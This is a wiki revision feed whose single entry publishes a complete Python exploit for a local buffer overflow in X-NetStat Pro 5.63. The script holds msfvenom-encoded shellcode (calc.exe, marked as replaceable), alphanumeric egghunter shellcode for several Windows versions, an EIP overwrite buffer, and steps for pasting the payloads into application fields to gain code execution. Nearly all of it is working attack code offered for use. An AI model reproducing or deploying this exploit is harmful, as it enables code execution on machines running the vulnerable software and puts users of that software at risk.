<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=X-NetStat_Pro_5.63_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>X-NetStat Pro 5.63 本地緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=X-NetStat_Pro_5.63_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=X-NetStat_Pro_5.63_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T21:22:49Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=X-NetStat_Pro_5.63_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2029&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python #---------------------------------------------------------------------------------------------------------# # Exploit: X-NetStat Pro 5.63 -...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=X-NetStat_Pro_5.63_%E6%9C%AC%E5%9C%B0%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=2029&amp;oldid=prev"/>
		<updated>2021-05-02T04:53:07Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python #---------------------------------------------------------------------------------------------------------# # Exploit: X-NetStat Pro 5.63 -...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python&lt;br /&gt;
#---------------------------------------------------------------------------------------------------------#&lt;br /&gt;
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)                                         #&lt;br /&gt;
# Date: 2019-03-23                                                                                        #&lt;br /&gt;
# Author: Peyman Forouzan                                                                                 #&lt;br /&gt;
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit        #&lt;br /&gt;
# Vendor Homepage: https://freshsoftware.com                                                              #&lt;br /&gt;
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe                                #&lt;br /&gt;
# Version: 5.63                                                                                           #&lt;br /&gt;
# Special Thanks to my wife                                                                               #&lt;br /&gt;
# The program has Local Buffer Overflow in several places.                                                #&lt;br /&gt;
# Note: Although there are even more simple codes to this vulnerability,                                  #&lt;br /&gt;
# this technique (EggHunter) has been used to run vulnerability in different windows versions.            #&lt;br /&gt;
# Steps :                                                                                                 #&lt;br /&gt;
#  1- Run python code : X-NetStat.py ( Three files are created )                                          #&lt;br /&gt;
#  2- App --&amp;gt; Tools --&amp;gt; HTTP Client --&amp;gt; paste in contents from the egg.txt into &amp;quot;URL&amp;quot;                     #&lt;br /&gt;
#         --&amp;gt; Enter --&amp;gt; Close HTTP Client window.                                                         #&lt;br /&gt;
#  3- Rules --&amp;gt; Add New Rule --&amp;gt; Actions --&amp;gt; paste in contents from the egghunter-winxp-win7.txt          #&lt;br /&gt;
#     or egghunter-win10.txt (depend on your windows version) into &amp;quot;Run Program&amp;quot; --&amp;gt; Ok                   #&lt;br /&gt;
#     --&amp;gt; Wait a litle --&amp;gt; Shellcode (Calc) open                                                          #&lt;br /&gt;
# Also Instead of the third stage you can :                                                               #&lt;br /&gt;
#     File --&amp;gt; Import / Resolve bulk IP List ... --&amp;gt; paste in contents from the egghunter-winxp-win7.txt  #&lt;br /&gt;
#     or egghunter-win10.txt (depend on your windows version) into &amp;quot;IP List (One IP per Line)&amp;quot; --&amp;gt;        #&lt;br /&gt;
#     Then Press Open file (Folder) Icon --&amp;gt; Wait a litle --&amp;gt; Shellcode (Calc) open                       #&lt;br /&gt;
#---------------------------------------------------------------------------------------------------------#&lt;br /&gt;
# &amp;quot;Egg&amp;quot; shellcode into memory --&amp;gt; Egghunter field overflow: EIP overwrite                                 #&lt;br /&gt;
#---------------------------------------------------------------------------------------------------------#&lt;br /&gt;
&lt;br /&gt;
#------------------------------------   EGG Shellcode Generation    ---------------------------------------&lt;br /&gt;
&lt;br /&gt;
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg&lt;br /&gt;
# ( Can be replaced with Shellcode )&lt;br /&gt;
egg =  &amp;quot;w00tw00t&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44&amp;quot;&lt;br /&gt;
egg += &amp;quot;\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
f = open (&amp;quot;egg.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(egg)&lt;br /&gt;
f.close()&lt;br /&gt;
&lt;br /&gt;
#---------------------------------   EGG Hunter Shellcode Generation    -----------------------------------&lt;br /&gt;
&lt;br /&gt;
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters&lt;br /&gt;
&lt;br /&gt;
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)&lt;br /&gt;
egghunter =  &amp;quot;\x4c\x4c\x4c\x4c\x5f&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51&amp;quot;&lt;br /&gt;
egghunter += &amp;quot;\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# EggHunter - Modified Version for Windows10 (32-64 bit)&lt;br /&gt;
egghunter10 =  &amp;quot;\x4c\x4c\x4c\x4c\x5f&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c&amp;quot;&lt;br /&gt;
egghunter10 += &amp;quot;\x6b\x4f\x68\x67\x41\x41&amp;quot;&lt;br /&gt;
&lt;br /&gt;
eip = &amp;quot;\x77\x5a\x46&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buffer = egghunter + &amp;quot;\x41&amp;quot; * (264 - len(egghunter)) + eip   # Direct Eip Overflow&lt;br /&gt;
&lt;br /&gt;
f = open (&amp;quot;egghunter-winxp-win7.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f.write(buffer)&lt;br /&gt;
f.close()&lt;br /&gt;
buffer = egghunter10 + &amp;quot;\x41&amp;quot; * (264 - len(egghunter10)) + eip   # Direct Eip Overflow&lt;br /&gt;
f2 = open (&amp;quot;egghunter-win10.txt&amp;quot;, &amp;quot;w&amp;quot;)&lt;br /&gt;
f2.write(buffer)&lt;br /&gt;
f2.close()&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>